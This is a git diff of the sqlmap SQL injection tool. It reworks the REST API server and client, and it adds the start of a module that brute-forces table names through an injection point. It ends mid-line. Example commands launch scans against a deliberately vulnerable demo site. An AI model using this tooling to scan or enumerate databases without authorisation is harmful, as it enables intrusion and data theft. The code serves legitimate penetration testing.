and the file path of the IPC database self.options.api = True self.options.taskid = taskid - self.options.database = db.get_filepath() + self.options.database = Database.filepath - # Enforce batch mode and disable coloring + # Enforce batch mode and disable coloring and ETA self.options.batch = True self.options.disableColoring = True + self.options.eta = False + + self._original_options = AttribDict(self.options) def set_option(self, option, value): self.options[option] = value @@ -124,31 +166,60 @@ def get_option(self, option): def get_options(self): return self.options - def set_output_directory(self): - self.output_directory = tempfile.mkdtemp(prefix="sqlmapoutput-") - self.set_option("oDir", self.output_directory) - - def clean_filesystem(self): - shutil.rmtree(self.output_directory) + def reset_options(self): + self.options = AttribDict(self._original_options) def engine_start(self): - self.process = Popen("python sqlmap.py 
--pickled-options %s" % base64pickle(self.options), shell=True, stdin=PIPE) + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + saveConfig(self.options, configFile) + + if os.path.exists("sqlmap.py"): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "sqlmap.py")): + self.process = Popen([sys.executable or "python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.path.join(os.path.abspath(os.path.dirname(sys.argv[0]))), close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) def engine_stop(self): if self.process: self.process.terminate() + return self.process.wait() + else: + return None + + def engine_process(self): + return self.process def engine_kill(self): if self.process: - self.process.kill() + try: + self.process.kill() + return self.process.wait() + except: + pass + return None + + def engine_get_id(self): + if self.process: + return self.process.pid + else: + return None - def engine_get_pid(self): - return self.processid.pid + def engine_get_returncode(self): + if self.process: + self.process.poll() + return self.process.returncode + else: + return None + + def engine_has_terminated(self): + return isinstance(self.engine_get_returncode(), int) # Wrapper functions for sqlmap engine class StdDbOut(object): - encoding = "UTF-8" - def __init__(self, taskid, messagetype="stdout"): # Overwrite system standard output and standard error to write # to an IPC database @@ -160,11 +231,35 @@ def __init__(self, taskid, messagetype="stdout"): else: sys.stderr = self - def write(self, value, status=None, content_type=None): + def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): if self.messagetype == "stdout": - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + if content_type is None: + if kb.partRun is not None: + content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) + else: + # Ignore all non-relevant messages + return + + output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) + + # Delete partial output from IPC database if we have got a complete output + if status == CONTENT_STATUS.COMPLETE: + if len(output) > 0: + for index in xrange(len(output)): + conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) + + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + if kb.partRun: + kb.partRun = None + + elif status == CONTENT_STATUS.IN_PROGRESS: + if len(output) == 0: + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) + else: + new_value = "%s%s" % (dejsonize(output[0][2]), value) + conf.databaseCursor.execute("UPDATE data SET value = ? 
WHERE id = ?", (jsonize(new_value), output[0][0])) else: - conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, value)) + conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) def flush(self): pass @@ -181,14 +276,15 @@ def emit(self, record): Record emitted events to IPC database for asynchronous I/O communication with the parent process """ - conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", - (conf.taskid, time.strftime("%X"), record.levelname, - record.msg % record.args if record.args else record.msg)) + conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, str(record.msg % record.args if record.args else record.msg))) def setRestAPILog(): - if hasattr(conf, "api"): - conf.database_connection = sqlite3.connect(conf.database, timeout=1, isolation_level=None) - conf.database_cursor = conf.database_connection.cursor() + if conf.api: + try: + conf.databaseCursor = Database(conf.database) + conf.databaseCursor.connect("client") + except sqlite3.OperationalError as ex: + raise SqlmapConnectionException("%s ('%s')" % (ex, conf.database)) # Set a logging handler that writes log messages to a IPC database logger.removeHandler(LOGGER_HANDLER) @@ -196,12 +292,31 @@ def setRestAPILog(): logger.addHandler(LOGGER_RECORDER) # Generic functions -def is_admin(taskid): - global adminid - if adminid != taskid: - return False +def is_admin(token): + return DataStore.admin_token == token + +@hook('before_request') +def check_authentication(): + if not any((DataStore.username, DataStore.password)): + return + + authorization = request.headers.get("Authorization", "") + match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization) + + if not match: + request.environ["PATH_INFO"] = "/error/401" + + try: + creds = decodeBase64(match.group(1), binary=False) + except: + request.environ["PATH_INFO"] = "/error/401" else: - return True + if creds.count(':') != 1: + request.environ["PATH_INFO"] = "/error/401" + else: + username, password = creds.split(':') + if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""): + request.environ["PATH_INFO"] = "/error/401" @hook("after_request") def security_headers(json_header=True): @@ -215,6 +330,7 @@ def security_headers(json_header=True): response.headers["Pragma"] = "no-cache" response.headers["Cache-Control"] = "no-cache" response.headers["Expires"] = "0" + if json_header: response.content_type = "application/json; charset=UTF-8" @@ -222,26 +338,35 @@ def security_headers(json_header=True): # HTTP Status Code functions # ############################## -@error(401) # Access Denied +@return_error(401) # Access Denied def error401(error=None): security_headers(False) return "Access denied" -@error(404) # Not Found +@return_error(404) # Not Found def error404(error=None): security_headers(False) return "Nothing here" -@error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) +@return_error(405) # Method Not Allowed (e.g. 
when requesting a POST method via GET) def error405(error=None): security_headers(False) return "Method not allowed" -@error(500) # Internal Server Error +@return_error(500) # Internal Server Error def error500(error=None): security_headers(False) return "Internal server error" +############# +# Auxiliary # +############# + +@get('/error/401') +def path_401(): + response.status = 401 + return response + ############################# # Task management functions # ############################# @@ -250,199 +375,230 @@ def error500(error=None): @get("/task/new") def task_new(): """ - Create new task ID + Create a new task """ - global tasks + taskid = encodeHex(os.urandom(8), binary=False) + remote_addr = request.remote_addr - taskid = hexencode(os.urandom(8)) - tasks[taskid] = Task(taskid) + DataStore.tasks[taskid] = Task(taskid, remote_addr) - return jsonize({"taskid": taskid}) + logger.debug("Created new task: '%s'" % taskid) + return jsonize({"success": True, "taskid": taskid}) -@get("/task/<taskid>/destroy") -def task_destroy(taskid): +@get("/task/<taskid>/delete") +def task_delete(taskid): """ - Destroy own task ID + Delete an existing task """ - if taskid in tasks: - tasks[taskid].clean_filesystem() - tasks.pop(taskid) + if taskid in DataStore.tasks: + DataStore.tasks.pop(taskid) + + logger.debug("(%s) Deleted task" % taskid) return jsonize({"success": True}) else: - abort(500, "Invalid task ID") + response.status = 404 + logger.warning("[%s] Non-existing task ID provided to task_delete()" % taskid) + return jsonize({"success": False, "message": "Non-existing task ID"}) + +################### +# Admin functions # +################### -# Admin's methods -@get("/task/<taskid>/list") -def task_list(taskid): +@get("/admin/list") +@get("/admin/<token>/list") +def task_list(token=None): """ - List all active tasks + Pull task list """ - if is_admin(taskid): - return jsonize({"tasks": tasks}) - else: - abort(401) + tasks = {} + + for key in DataStore.tasks: + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] -@get("/task/<taskid>/flush") -def task_flush(taskid): + logger.debug("(%s) Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) + +@get("/admin/flush") +@get("/admin/<token>/flush") +def task_flush(token=None): """ - Flush task spool (destroy all tasks) + Flush task spool (delete all tasks) """ - global tasks - if is_admin(taskid): - for task in tasks: - tasks[task].clean_filesystem() + for key in list(DataStore.tasks): + if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr: + DataStore.tasks[key].engine_kill() + del DataStore.tasks[key] - tasks = dict() - return jsonize({"success": True}) - else: - abort(401) + logger.debug("(%s) Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True}) ################################## # sqlmap core interact functions # ################################## -# Admin's methods -@get("/status/<taskid>") -def status(taskid): - """ - Verify the status of the API as well as the core - """ - - if is_admin(taskid): - tasks_num = len(tasks) - return jsonize({"tasks": tasks_num}) - else: - abort(401) - -# Functions to handle options +# Handle task's options @get("/option/<taskid>/list") def option_list(taskid): """ List options for a certain task ID """ - if taskid not in tasks: - 
abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - return jsonize(tasks[taskid].get_options()) + logger.debug("(%s) Listed task options" % taskid) + return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) @post("/option/<taskid>/get") def option_get(taskid): """ - Get the value of an option (command line switch) for a certain task ID + Get value of option(s) for a certain task ID """ - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - option = request.json.get("option", "") + options = request.json or [] + results = {} - if option in tasks[taskid]: - return jsonize({option: tasks[taskid].get_option(option)}) - else: - return jsonize({option: None}) + for option in options: + if option in DataStore.tasks[taskid].options: + results[option] = DataStore.tasks[taskid].options[option] + else: + logger.debug("(%s) Requested value for unknown option '%s'" % (taskid, option)) + return jsonize({"success": False, "message": "Unknown option '%s'" % option}) + + logger.debug("(%s) Retrieved values for option(s) '%s'" % (taskid, ','.join(options))) + + return jsonize({"success": True, "options": results}) @post("/option/<taskid>/set") def option_set(taskid): """ - Set an option (command line switch) for a certain task ID + Set value of option(s) for a certain task ID """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) + + if request.json is None: + logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid) + return jsonize({"success": False, "message": "Invalid JSON options"}) for option, value in request.json.items(): - tasks[taskid].set_option(option, value) + DataStore.tasks[taskid].set_option(option, value) + logger.debug("(%s) Requested to set options" % taskid) return jsonize({"success": True}) -# Function to handle scans +# Handle scans @post("/scan/<taskid>/start") def scan_start(taskid): """ Launch a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - # Initialize sqlmap engine's options with user's provided options, if any - for option, value in request.json.items(): - tasks[taskid].set_option(option, value) + if request.json is None: + logger.warning("[%s] Invalid JSON options provided to scan_start()" % taskid) + return jsonize({"success": False, "message": "Invalid JSON options"}) - # Overwrite output directory value to a temporary directory - tasks[taskid].set_output_directory() + for key in request.json: + if key in RESTAPI_UNSUPPORTED_OPTIONS: + logger.warning("[%s] Unsupported option '%s' provided to scan_start()" % (taskid, key)) + return jsonize({"success": False, "message": "Unsupported option '%s'" % key}) - # Launch sqlmap engine in a separate thread - logger.debug("starting a scan for task ID %s" % taskid) + # Initialize sqlmap engine's options with user's provided options, if any + for 
option, value in request.json.items(): + DataStore.tasks[taskid].set_option(option, value) - # Launch sqlmap engine - tasks[taskid].engine_start() + # Launch sqlmap engine in a separate process + DataStore.tasks[taskid].engine_start() - return jsonize({"success": True}) + logger.debug("(%s) Started scan" % taskid) + return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) @get("/scan/<taskid>/stop") def scan_stop(taskid): """ Stop a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): + logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - return jsonize({"success": tasks[taskid].engine_stop()}) + DataStore.tasks[taskid].engine_stop() + + logger.debug("(%s) Stopped scan" % taskid) + return jsonize({"success": True}) @get("/scan/<taskid>/kill") def scan_kill(taskid): """ Kill a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()): + logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - return jsonize({"success": tasks[taskid].engine_kill()}) + DataStore.tasks[taskid].engine_kill() -@get("/scan/<taskid>/delete") -def scan_delete(taskid): + logger.debug("(%s) Killed scan" % taskid) + return jsonize({"success": True}) + +@get("/scan/<taskid>/status") +def scan_status(taskid): """ - Delete a scan and corresponding temporary output directory and IPC database + Returns status of a scan """ - global tasks - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - scan_stop(taskid) - tasks[taskid].clean_filesystem() + if DataStore.tasks[taskid].engine_process() is None: + status = "not running" + else: + status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" - return jsonize({"success": True}) + logger.debug("(%s) Retrieved scan status" % taskid) + return jsonize({ + "success": True, + "status": status, + "returncode": DataStore.tasks[taskid].engine_get_returncode() + }) @get("/scan/<taskid>/data") def scan_data(taskid): """ Retrieve the data of a scan """ - global db - global tasks + json_data_message = list() json_errors_message = list() - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) # Read all data from the IPC database for the taskid - for status, content_type, value in db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): - json_data_message.append([status, content_type, dejsonize(value)]) + for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? 
ORDER BY id ASC", (taskid,)): + json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)}) # Read all error messages from the IPC database - for error in db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): + for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) - return jsonize({"data": json_data_message, "error": json_errors_message}) + logger.debug("(%s) Retrieved scan data and error messages" % taskid) + return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) # Functions to handle scans' logs @get("/scan/<taskid>/log/<start>/<end>") @@ -450,42 +606,45 @@ def scan_log_limited(taskid, start, end): """ Retrieve a subset of log messages """ - global db - global tasks + json_log_messages = list() - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - if not start.isdigit() or not end.isdigit() or end < start: - abort(500, "Invalid start or end value, must be digits") + if not start.isdigit() or not end.isdigit() or int(end) < int(start): + logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) + return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) start = max(1, int(start)) end = max(1, int(end)) # Read a subset of log messages from the IPC database - for time_, level, message in db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) - return jsonize({"log": json_log_messages}) + logger.debug("(%s) Retrieved scan log messages subset" % taskid) + return jsonize({"success": True, "log": json_log_messages}) @get("/scan/<taskid>/log") def scan_log(taskid): """ Retrieve the log messages """ - global db - global tasks + json_log_messages = list() - if taskid not in tasks: - abort(500, "Invalid task ID") + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database - for time_, level, message in db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? 
ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) - return jsonize({"log": json_log_messages}) + logger.debug("(%s) Retrieved scan log messages" % taskid) + return jsonize({"success": True, "log": json_log_messages}) # Function to handle files inside the output directory @get("/download/<taskid>/<target>/<filename:path>") @@ -493,47 +652,267 @@ def download(taskid, target, filename): """ Download a certain file from the file system """ - if taskid not in tasks: - abort(500, "Invalid task ID") - # Prevent file path traversal - the lame way - if target.startswith("."): - abort(500) + if taskid not in DataStore.tasks: + logger.warning("[%s] Invalid task ID provided to download()" % taskid) + return jsonize({"success": False, "message": "Invalid task ID"}) - path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target) + path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) + # Prevent file path traversal + if not path.startswith(paths.SQLMAP_OUTPUT_PATH): + logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) + return jsonize({"success": False, "message": "Forbidden path"}) - if os.path.exists(path): - return static_file(filename, root=path) + if os.path.isfile(path): + logger.debug("(%s) Retrieved content of file %s" % (taskid, target)) + content = openFile(path, "rb").read() + return jsonize({"success": True, "file": encodeBase64(content, binary=False)}) else: - abort(500) + logger.warning("[%s] File does not exist %s" % (taskid, target)) + return jsonize({"success": False, "message": "File does not exist"}) + +@get("/version") +def version(token=None): + """ + Fetch server version + """ -def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): + logger.debug("Fetched version (%s)" % ("admin" if is_admin(token) else request.remote_addr)) + return jsonize({"success": True, "version": VERSION_STRING.split('/')[-1]}) + +def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None, database=None): """ REST-JSON API server """ - global adminid - global db - adminid = hexencode(os.urandom(16)) - db = Database() - db.initialize() + DataStore.admin_token = encodeHex(os.urandom(16), binary=False) + DataStore.username = username + DataStore.password = password + + if not database: + _, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False) + os.close(_) + else: + Database.filepath = database + + if port == 0: # random + with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: + s.bind((host, 0)) + port = s.getsockname()[1] + + logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) + logger.info("Admin (secret) token: %s" % DataStore.admin_token) + logger.debug("IPC database: '%s'" % Database.filepath) - logger.info("running REST-JSON API server at '%s:%d'.." 
% (host, port)) - logger.info("the admin task ID is: %s" % adminid) + # Initialize IPC database + DataStore.current_db = Database() + DataStore.current_db.connect() + DataStore.current_db.init() # Run RESTful API - run(host=host, port=port, quiet=False, debug=False) + try: + # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref + # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names + + if adapter == "gevent": + from gevent import monkey + monkey.patch_all() + elif adapter == "eventlet": + import eventlet + eventlet.monkey_patch() + logger.debug("Using adapter '%s' to run bottle" % adapter) + run(host=host, port=port, quiet=True, debug=True, server=adapter) + except socket.error as ex: + if "already in use" in getSafeExString(ex): + logger.error("Address already in use ('%s:%s')" % (host, port)) + else: + raise + except ImportError: + if adapter.lower() not in server_names: + errMsg = "Adapter '%s' is unknown. " % adapter + errMsg += "List of supported adapters: %s" % ', '.join(sorted(list(server_names.keys()))) + else: + errMsg = "Server support for adapter '%s' is not installed on this system " % adapter + errMsg += "(Note: you can try to install it with 'apt install python-%s' or 'pip%s install %s')" % (adapter, '3' if six.PY3 else "", adapter) + logger.critical(errMsg) + +def _client(url, options=None): + logger.debug("Calling '%s'" % url) + try: + headers = {"Content-Type": "application/json"} + + if options is not None: + data = getBytes(jsonize(options)) + else: + data = None -def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): + if DataStore.username or DataStore.password: + headers["Authorization"] = "Basic %s" % encodeBase64("%s:%s" % (DataStore.username or "", DataStore.password or ""), binary=False) + + req = _urllib.request.Request(url, data, headers) + response = _urllib.request.urlopen(req) + text = getText(response.read()) + except: + if options: + logger.error("Failed to load and parse %s" % url) + raise + return text + +def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None): """ REST-JSON API client """ + + DataStore.username = username + DataStore.password = password + + dbgMsg = "Example client access from command line:" + dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\\{16\\}') && echo $taskid" % (host, port) + dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) + logger.debug(dbgMsg) + addr = "http://%s:%d" % (host, port) - logger.info("starting debug REST-JSON client to '%s'..." 
% addr) - - # TODO: write a simple client with requests, for now use curl from command line - logger.error("not yet implemented, use curl from command line instead for now, for example:") - print "\n\t$ curl http://%s:%d/task/new" % (host, port) - print "\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/:taskid/start" % (host, port) - print "\t$ curl http://%s:%d/scan/:taskid/output" % (host, port) - print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port) + logger.info("Starting REST-JSON API client to '%s'..." % addr) + + try: + _client(addr) + except Exception as ex: + if not isinstance(ex, _urllib.error.HTTPError) or ex.code == _http_client.UNAUTHORIZED: + errMsg = "There has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % getSafeExString(ex) + logger.critical(errMsg) + return + + commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "version", "exit", "bye", "quit") + colors = ('red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'lightgrey', 'lightred', 'lightgreen', 'lightyellow', 'lightblue', 'lightmagenta', 'lightcyan') + autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) + + taskid = None + logger.info("Type 'help' or '?' for list of available commands") + + while True: + try: + color = colors[int(taskid or "0", 16) % len(colors)] + command = _input("api%s> " % (" (%s)" % setColor(taskid, color) if taskid else "")).strip() + command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) + except (EOFError, KeyboardInterrupt): + print() + break + + if command in ("data", "log", "status", "stop", "kill"): + if not taskid: + logger.error("No task ID in use") + continue + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("option"): + if not taskid: + logger.error("No task ID in use") + continue + try: + command, option = command.split(" ", 1) + except ValueError: + raw = _client("%s/option/%s/list" % (addr, taskid)) + else: + options = re.split(r"\s*,\s*", option.strip()) + raw = _client("%s/option/%s/get" % (addr, taskid), options) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + try: + argv = ["sqlmap.py"] + shlex.split(command)[1:] + except Exception as ex: + logger.error("Error occurred while parsing arguments ('%s')" % getSafeExString(ex)) + taskid = None + continue + + try: + cmdLineOptions = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] + + raw = _client("%s/task/new" % addr) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task ('%s')" % res.get("message", "")) + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to start scan ('%s')" % res.get("message", "")) + continue + logger.info("Scanning started") + + elif command.startswith("use"): + taskid = 
(command.split()[1] if ' ' in command else "").strip("'\"") + if not taskid: + logger.error("Task ID is missing") + taskid = None + continue + elif not re.search(r"\A[0-9a-fA-F]{16}\Z", taskid): + logger.error("Invalid task ID '%s'" % taskid) + taskid = None + continue + logger.info("Switching to task ID '%s' " % taskid) + + elif command in ("version",): + raw = _client("%s/%s" % (addr, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command in ("list", "flush"): + raw = _client("%s/admin/%s" % (addr, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None + dataToStdout("%s\n" % raw) + + elif command in ("exit", "bye", "quit", 'q'): + return + + elif command in ("help", "?"): + msg = "help Show this help message\n" + msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" + msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" + msg += "data Retrieve and show data for current task\n" + msg += "log Retrieve and show log for current task\n" + msg += "status Retrieve and show status for current task\n" + msg += "option OPTION Retrieve and show option for current task\n" + msg += "options Retrieve and show all options for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" + msg += "version Fetch server version\n" + msg += "flush Flush tasks (delete all tasks)\n" + msg += "exit Exit this client\n" + + dataToStdout(msg) + + elif command: + logger.error("Unknown command '%s'" % command) diff --git a/lib/utils/brute.py b/lib/utils/brute.py new file mode 100644 index 00000000000..7833a3982ce --- /dev/null +++ b/lib/utils/brute.py @@ -0,0 +1,408 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import time + +from lib.core.common import Backend +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import filterListValue +from lib.core.common import getFileItems +from lib.core.common import getPageWordSet +from lib.core.common import hashDBWrite +from lib.core.common import isNoneValue +from lib.core.common import ntToPosixSlashes +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.decorators import stackedmethod +from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapMissingMandatoryOptionException +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE +from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX +from 
lib.core.settings import UPPER_CASE_DBMSES +from lib.core.threads import getCurrentThreadData +from lib.core.threads import runThreads +from lib.request import inject + +def _addPageTextWords(): + wordsList = [] + + infoMsg = "adding words used on web page to the check list" + logger.info(infoMsg) + pageWords = getPageWordSet(kb.originalPage) + + for word in pageWords: + word = word.lower() + + if len(word) > 2 and not word[0].isdigit() and word not in wordsList: + wordsList.append(word) + + return wordsList + +@stackedmethod +def tableExists(tableFile, regex=None): + if kb.choices.tableExists is None and not any(_ for _ in kb.injection.data if _ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) and not conf.direct: + warnMsg = "it's not recommended to use '%s' and/or '%s' " % (PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.TIME], PAYLOAD.SQLINJECTION[PAYLOAD.TECHNIQUE.STACKED]) + warnMsg += "for common table existence check" + logger.warning(warnMsg) + + message = "are you sure you want to continue? [y/N] " + kb.choices.tableExists = readInput(message, default='N', boolean=True) + + if not kb.choices.tableExists: + return None + + result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) + + if result: + errMsg = "can't use table existence check because of detected invalid results " + errMsg += "(most likely caused by inability of the used injection " + errMsg += "to distinguish erroneous results)" + raise SqlmapDataException(errMsg) + + pushValue(conf.db) + + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: + conf.db = conf.db.upper() + + message = "which common tables (wordlist) file do you want to use?\n" + message += "[1] default '%s' (press Enter)\n" % tableFile + message += "[2] custom" + choice = readInput(message, default='1') + + if choice == '2': + message = "what's the custom common tables file location?\n" + tableFile = readInput(message) or tableFile + + infoMsg = "performing table existence using items from '%s'" % tableFile + logger.info(infoMsg) + + tables = getFileItems(tableFile, 